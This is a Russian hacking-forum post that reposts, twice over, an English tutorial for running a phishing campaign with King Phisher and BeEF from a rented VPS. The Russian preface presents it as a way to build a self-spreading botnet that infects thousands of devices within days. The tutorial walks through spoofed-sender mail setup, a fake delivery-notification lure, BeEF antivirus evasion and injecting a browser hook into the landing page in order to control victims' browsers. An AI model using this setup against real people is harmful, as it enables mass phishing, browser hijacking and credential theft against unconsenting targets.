Если вникните то вы поймете что это просто гениально!
Инструкция на англ, лично я почти не знаю англ. но все понял прекрастно
Здесь написано как сделать подобие ботнета который сам себя спаммит используя:
KingPhisher + BeEF
Хайд буду открывать, но не всем.
Информация предоставленна в целях ознакомления!
Автор темы и администрация hhide.su не несет ответственности за нанесенный вами ущерб
Используя данный метод можно заразить тысячи устройств за пару дней
Будьте осторожнее с этим, отдел К не спит)
Running a phishing campaign against your organisation is a good way to educate users against the perils of the inbox. Some of the common problems with education-based phishing runs of any reasonable size include:
king-phisher takes care of a lot of those problems. Here’s my quick and dirty setup that utilises a $10-per-month VPS service to run the campaign.
Scenario
As mentioned earlier, I’ll be deploying this to a $10/month cloud server on Digital Ocean as a 24/7 service is needed for a proper phishing campaign, and Digital Ocean offers a solid product at the right price. Not necessary, you can host it yourself of course.
To increase the chances of a successful campaign, we’ll be running the king-phisher web server on TCP port 80, and BeEF on TCP port 443 as both HTTP and HTTPS are pretty much guaranteed to be permitted on the outbound route of a normal business network.
Prerequisites
So I’ve got my cloud Ubuntu 14.10 x64 virtual machine ready to go, freshly updated/upgraded using the apt package manager. Next step is to install postgresql (we won’t be using sqlite as support is being wound back for king-phisher) along with some other dependencies, and then run the automated installer script. Use sudo or the root account as you see fit:
This will pull the latest version of king-phisher from SecureState’s GitHub repository, download all the dependencies and install king-phisher in the /opt directory. Go grab some coffee, as there are a number of packages for the installer to pull and configure. It took around 10 minutes.
If you happen to get any pip errors (particularly ImportError: cannot import name IncompleteRead), then you may need to re-install pip via easy_install:
…then rerun setup.sh to finish installing the server.
Once it’s complete, you’ll need to configure Postgresql to support your king-phisher instance. Use your favourite editor to add the following line to /etc/postgresql/9.4/main/pg_hba.conf:
..then configure the Postgresql user account for king_phisher:
If during the creation you are asked any questions about the role of the king_phisher user, just answer “n” to all of them. Once this is done, you’ll need to update the king-phisher server configuration to use your newly-created Postgresql database by editing /opt/king-phisher/server_config.yml. Comment out the following line:
..then add the following:
Make sure your indenting is accurate, then restart the Postgresql server. Test to make sure KingPhisherServer starts correctly:
Ok, the king-phisher server is now sorted. Ctrl+C to kill it for now, as it’s time to install BeEF into the /opt directory and configure its dependencies:
Edit /opt/beef/config.yaml and change the server port to 443:
…then enable antivirus evasion:
You should also DEFINITELY change the admin password for BeEF – this is also configurable in /opt/beef/config.yaml. You should now be able to run BeEF:
Righto, now we need to configure our mail transport agent. I won’t be using the king-phisher version, not because it’s not great, but just because so I’ll configure postfix instead. Swap out myname@mydomain for an appropriate value:
Select Internet Site and pick an appropriate FQDN value. THe sort out the rest of the config:
Add an entry to smtp_generic maps and change the inet_interfaces value to 127.0.0.1 in /etc/postfix/main/cf:
Restart postfix. Done.
Configuring the KingPhisher client
Configuring the client is pretty straight forward – see the king-phisher install page for a list of known supported platforms/OS. I’ll be using Kali 1.0.8 to run the client.Easiest way to get the client is to carbon copy what we did for the server, and install the extra packages that allow us to use the mapping functionality:
Now you should be able to run the gui client by navigating to /opt/king-phisher and running ./KingPhisher:
Back on your Digital Ocean box, start both the KingPhisher server and BeEF server, then fill in the connection details on your client and click Connect. Create a new campaign by giving it a name and click Select. You’ll now need to start filling in the fields for your campaign. Make sure you fill in all the fields – particularly the source email values. The campaign won’t run without them.
Let’s use the “fake delivery notification” template by setting the Message HTML file to
/opt/king-phisher/data/client/king_phisher/email_templates/purchases.html. This will utilise the fake delivery notification email template which will be sent to our victims.
The document root for KingPhisher’s webserver is specified in the last line /opt/king-phisher/server_config.yaml – the default location is /var/www so we’ll put all our web content there. For this campaign, let’s just symlink the web content for the education package provided by SecureState. Jump back onto your Digital Ocean box and run the following:
We will also use one of the SecureState email templates in the next step. Back on your Kali box (or whatever system you’re using to run the KingPhisher client) create a CSV file containing one firstname,lastname,emailaddress per line for each target in VIM/Nano/YourFavourite editor.
Now we should have everything we need to run the campaign:
The following fields are the most critical:
Web Server Url: This will be the address of your Digital Ocean box, mapped through to /var/www (I’ve obviously added a DNS record for mine here).
Source Email: The fake originating email address.
Message HTML File: Template for the campaign, located on your local system.
Target CSV File: The file containing your targets.
In the Edit tab, you can see how each element is pulled from the KingPhisher configuration and your template file to populate each mail. Once you’re happy with everything, click the Preview tab to see what your phishing email will look like.
SMTP Configuration settings
We need to tell the client how to talk to our postfix mail server. In the client, select Edit>Preferences and click the SMTP Server tab. Ensure the following are set:
– SMTP Server is set to localhost:25
– Tunnel Over SSH is on
– SSH Server Name is your Digital Ocean IP address
– SSH Username is your standard username on your Digital Ocean box
Click Apply when finished. It can take a little while for the GUI to become responsive again, so be patient.
Integrating BeEF hooks
Before we send this one off, we should configure the Beef hook to give us more exploitation options. Once again, under Edit>Preferences of the client you’ll find the BeEF Settings section under the Server tab. Take a look at your running version of BeEF on your Digital Ocean box (or the BeEF config itself) to find the hook URL and include that (something like http://1.2.3.4:443/hook.js) Remember – if you’ve followed this tutorial step by step, the hook should be running on TCP port 443.
You’ll need to make sure your victim(s) run the BeEF hook when they hit the landing page. Edit/var/www/index.html and add the following after the <head> tag:
Great, now they will be BeEF-hooked when they visit.
Initiate the campaign
Right, you should now be ready to go! In the Configuration tab, click Verify URL to make sure your KingPhisher server is running and that the landing page for your victims is active and reachable. Go to the Send tab and click Start to kick off your campaign. You’ll be asked to authenticate your client to your Digital Ocean box once more, the off go your nasty emails! Now you can sit back and watch the magic via the View Campaign tab or play with your victims via BeEF’s control panel.
I won’t walk you through campaign management and all the cool features that KingPhisher has, including global mapping, activity tracking, etc, suffice to say that it’s a great platform to run your campaigns from and is very easy to use once you’re set up.
Next time
I’ll follow up this post shortly to cover off some more functionality that you will find useful for your phishing campaigns, including:
– Enabling SSL/TLS
– Capturing credentials
Инструкция на англ, лично я почти не знаю англ. но все понял прекрастно
Здесь написано как сделать подобие ботнета который сам себя спаммит используя:
KingPhisher + BeEF
Хайд буду открывать, но не всем.
Информация предоставленна в целях ознакомления!
Автор темы и администрация hhide.su не несет ответственности за нанесенный вами ущерб
Используя данный метод можно заразить тысячи устройств за пару дней
Будьте осторожнее с этим, отдел К не спит)
Running a phishing campaign against your organisation is a good way to educate users against the perils of the inbox. Some of the common problems with education-based phishing runs of any reasonable size include:
- The pain of spinning up infrastructure for the campaign
- Tracking user participation and response
- The reconfiguration efforts required each time a new set of individuals is targeted
king-phisher takes care of a lot of those problems. Here’s my quick and dirty setup that utilises a $10-per-month VPS service to run the campaign.
Scenario
As mentioned earlier, I’ll be deploying this to a $10/month cloud server on Digital Ocean as a 24/7 service is needed for a proper phishing campaign, and Digital Ocean offers a solid product at the right price. Not necessary, you can host it yourself of course.
To increase the chances of a successful campaign, we’ll be running the king-phisher web server on TCP port 80, and BeEF on TCP port 443 as both HTTP and HTTPS are pretty much guaranteed to be permitted on the outbound route of a normal business network.
Prerequisites
- A box running Ubuntu 14.10 x64 (this probably works on Debian and a range of other distros, but no guarantees)
- A standard user configured (via adduser)
- Remotely accessible SSH server running
So I’ve got my cloud Ubuntu 14.10 x64 virtual machine ready to go, freshly updated/upgraded using the apt package manager. Next step is to install postgresql (we won’t be using sqlite as support is being wound back for king-phisher) along with some other dependencies, and then run the automated installer script. Use sudo or the root account as you see fit:
Code:
root@deceptor:~# apt-get install postgresql python-mpltoolkits.basemap python-mpltoolkits.basemap-data
Reading package lists… Done
Building dependency tree
Reading state information… Done
The following extra packages will be installed:
postgresql-9.4 postgresql-client-9.4 postgresql-client-common postgresql-common ssl-cert
…
* Starting PostgreSQL 9.4 database server [OK ]
Setting up postgresql (9.4+162) …
root@deceptor:~#
root@deceptor:~# cd /opt && wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && sudo bash ./install.sh
Linux version detected as Ubuntu
Downloading and installing the King Phisher server to /opt/king-phisher
Successfully cloned the git repo
Installing Ubuntu dependencies
…
root@deceptor:/opt#If you happen to get any pip errors (particularly ImportError: cannot import name IncompleteRead), then you may need to re-install pip via easy_install:
Code:
root@deceptor:~# apt-get remove python-pip
…
…
root@deceptor:~# easy_install pip
Searching for pip
Reading https://pypi.python.org/simple/pip/
…
…
Finished processing dependencies for pip
root@deceptor:~#Once it’s complete, you’ll need to configure Postgresql to support your king-phisher instance. Use your favourite editor to add the following line to /etc/postgresql/9.4/main/pg_hba.conf:
Code:
host “king_phisher” “king_phisher” 127.0.0.1/32 md5
Code:
root@deceptor:~# su postgres
postgres@deceptor:~# createuser king_phisher -P
Enter password for new role: :<yourpassword>
Enter it again: :<yourpassword>
postgres@deceptor:~# createdb –owner=king_phisher king_phisher
postgres@deceptor:~# exit
root@deceptor:~#
Code:
database: sqlite:////var/king-phisher/king-phisher.db
Code:
database: postgresql://king_phisher:<yourpassword>@localhost/king_phisher
Code:
oot@deceptor:~# /opt/king-phisher/KingPhisherServer -L INFO -f /opt/king-phisher/server_config.yml
INFO listening on 0.0.0.0:80
INFO 0.0.0.0:80 – basic authentication has been enabled
INFO 0.0.0.0:80 – serving files has been enabled
INFO initializing database connection with driver postgresql
INFO the job manager has been started
WARNING the specified geoip database does not exist, downloading a new copy
INFO Starting new HTTP connection (1): geolite.maxmind.com
INFO server running in process: 22826 main tid: 0x7ffbb4525740
INFO dropped privileges to the nobody account
Code:
root@deceptor:/opt# git clone https://github.com/beefproject/beef.git
Cloning into ‘beef’…
remote: Counting objects: 24769, done.
remote: Total 24769 (delta 0), reused 0 (delta 0), pack-reused 24769
Receiving objects: 100% (24769/24769), 9.69 MiB | 3.73 MiB/s, done.
Resolving deltas: 100% (12811/12811), done.
Checking connectivity… done.
root@deceptor:/opt/beef# apt-get install ruby-all-dev libsqlite3-dev sqlite3
…
root@deceptor:/opt# gem install rvm
…
root@deceptor:/opt# gem install bundler
…
root@deceptor:/opt# cd beef
…
root@deceptor:/opt/beef# ./beef
Could not find gem ‘eventmachine (>= 0) ruby’ in any of the gem sources listed in your Gemfile or available on this machine.
Run `bundle install` to install missing gems.
root@deceptor:/opt/beef# bundle install
…
root@deceptor:/opt/beef#
Code:
# HTTP server
http:
debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
host: “0.0.0.0”
port: “443”
Code:
evasion:
enable: true
Code:
root@deceptor:/opt/beef# ./beef
[ 6:45:33][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
[ 6:45:34][*] Browser Exploitation Framework (BeEF) 0.4.6.0-alpha
[ 6:45:34] | Twit: @beefproject
[ 6:45:34] | Site: http://beefproject.com
[ 6:45:34] | Blog: http://blog.beefproject.com
[ 6:45:34] |_ Wiki: https://github.com/beefproject/beef/wiki
[ 6:45:34][*] Project Creator: Wade Alcorn (@WadeAlcorn)
[ 6:45:34][*] BeEF is loading. Wait a few seconds…
[ 6:45:39][*] 13 extensions enabled.
[ 6:45:39][*] 240 modules enabled.
[ 6:45:39][*] 3 network interfaces were detected.
[ 6:45:39][+] running on network interface: 127.0.0.1
[ 6:45:39] | Hook URL: http://127.0.0.1:443/hook.js
[ 6:45:39] |_ UI URL: http://127.0.0.1:443/ui/panel
[ 6:45:39][+] running on network interface: 1.2.3.4
[ 6:45:39] | Hook URL: http://1.2.3.4:443/hook.js
[ 6:45:39] |_ UI URL: http://1.2.3.4:443/ui/panel
[ 6:45:39][+] running on network interface: 2.3.4.5
[ 6:45:39] | Hook URL: http://12.3.4.5:443/hook.js
[ 6:45:39] |_ UI URL: http://2.3.4.5:443/ui/panel
[ 6:45:39][*] RESTful API key: 3cxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx8e
[ 6:45:39][*] DNS Server: 127.0.0.1:5300 (udp)
[ 6:45:39] | Upstream Server: 8.8.8.8:53 (udp)
[ 6:45:39] |_ Upstream Server: 8.8.8.8:53 (tcp)
[ 6:45:39][*] HTTP Proxy: http://127.0.0.1:6789
[ 6:45:39][*] BeEF server started (press control+c to stop)
Code:
root@deceptor:/opt/beef# apt-get install mailutils postfix
…
Code:
root@deceptor:/opt/beef# echo “root [email protected]” > /etc/postfix/generic
root@deceptor:/opt/beef# postmap /etc/postfix/generic
Code:
inet_interfaces = 127.0.0.1
smtp_generic_maps = hash:/etc/postfix/genericConfiguring the KingPhisher client
Configuring the client is pretty straight forward – see the king-phisher install page for a list of known supported platforms/OS. I’ll be using Kali 1.0.8 to run the client.Easiest way to get the client is to carbon copy what we did for the server, and install the extra packages that allow us to use the mapping functionality:
Code:
root@kali:~# apt-get install libgeos++-dev libgeos-3.3.3 libgeos-dev python-mpltoolkits.basemap python-mpltoolkits.basemap-data
Reading package lists… Done
Building dependency tree
Reading state information… Done
…
…
root@kali:~#
root@kali:~# wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && sudo bash ./install.sh
Linux version detected as Kali
Downloading and installing the King Phisher server to /opt/king-phisher
…
…
Start the King Phisher server with the following command:
sudo /opt/king-phisher/KingPhisherServer -L INFO -f /opt/king-phisher/server_config.yml
root@kali:~#Back on your Digital Ocean box, start both the KingPhisher server and BeEF server, then fill in the connection details on your client and click Connect. Create a new campaign by giving it a name and click Select. You’ll now need to start filling in the fields for your campaign. Make sure you fill in all the fields – particularly the source email values. The campaign won’t run without them.
Let’s use the “fake delivery notification” template by setting the Message HTML file to
/opt/king-phisher/data/client/king_phisher/email_templates/purchases.html. This will utilise the fake delivery notification email template which will be sent to our victims.
The document root for KingPhisher’s webserver is specified in the last line /opt/king-phisher/server_config.yaml – the default location is /var/www so we’ll put all our web content there. For this campaign, let’s just symlink the web content for the education package provided by SecureState. Jump back onto your Digital Ocean box and run the following:
Code:
root@deceptor:~# ln -s /opt/king-phisher/data/server/king_phisher/education/* /var/wwwWe will also use one of the SecureState email templates in the next step. Back on your Kali box (or whatever system you’re using to run the KingPhisher client) create a CSV file containing one firstname,lastname,emailaddress per line for each target in VIM/Nano/YourFavourite editor.
Now we should have everything we need to run the campaign:
The following fields are the most critical:
Web Server Url: This will be the address of your Digital Ocean box, mapped through to /var/www (I’ve obviously added a DNS record for mine here).
Source Email: The fake originating email address.
Message HTML File: Template for the campaign, located on your local system.
Target CSV File: The file containing your targets.
In the Edit tab, you can see how each element is pulled from the KingPhisher configuration and your template file to populate each mail. Once you’re happy with everything, click the Preview tab to see what your phishing email will look like.
SMTP Configuration settings
We need to tell the client how to talk to our postfix mail server. In the client, select Edit>Preferences and click the SMTP Server tab. Ensure the following are set:
– SMTP Server is set to localhost:25
– Tunnel Over SSH is on
– SSH Server Name is your Digital Ocean IP address
– SSH Username is your standard username on your Digital Ocean box
Click Apply when finished. It can take a little while for the GUI to become responsive again, so be patient.
Integrating BeEF hooks
Before we send this one off, we should configure the Beef hook to give us more exploitation options. Once again, under Edit>Preferences of the client you’ll find the BeEF Settings section under the Server tab. Take a look at your running version of BeEF on your Digital Ocean box (or the BeEF config itself) to find the hook URL and include that (something like http://1.2.3.4:443/hook.js) Remember – if you’ve followed this tutorial step by step, the hook should be running on TCP port 443.
You’ll need to make sure your victim(s) run the BeEF hook when they hit the landing page. Edit/var/www/index.html and add the following after the <head> tag:
Code:
<script src=”/kp.js” ></script>Initiate the campaign
Right, you should now be ready to go! In the Configuration tab, click Verify URL to make sure your KingPhisher server is running and that the landing page for your victims is active and reachable. Go to the Send tab and click Start to kick off your campaign. You’ll be asked to authenticate your client to your Digital Ocean box once more, the off go your nasty emails! Now you can sit back and watch the magic via the View Campaign tab or play with your victims via BeEF’s control panel.
I won’t walk you through campaign management and all the cool features that KingPhisher has, including global mapping, activity tracking, etc, suffice to say that it’s a great platform to run your campaigns from and is very easy to use once you’re set up.
Next time
I’ll follow up this post shortly to cover off some more functionality that you will find useful for your phishing campaigns, including:
– Enabling SSL/TLS
– Capturing credentials
Last edited:
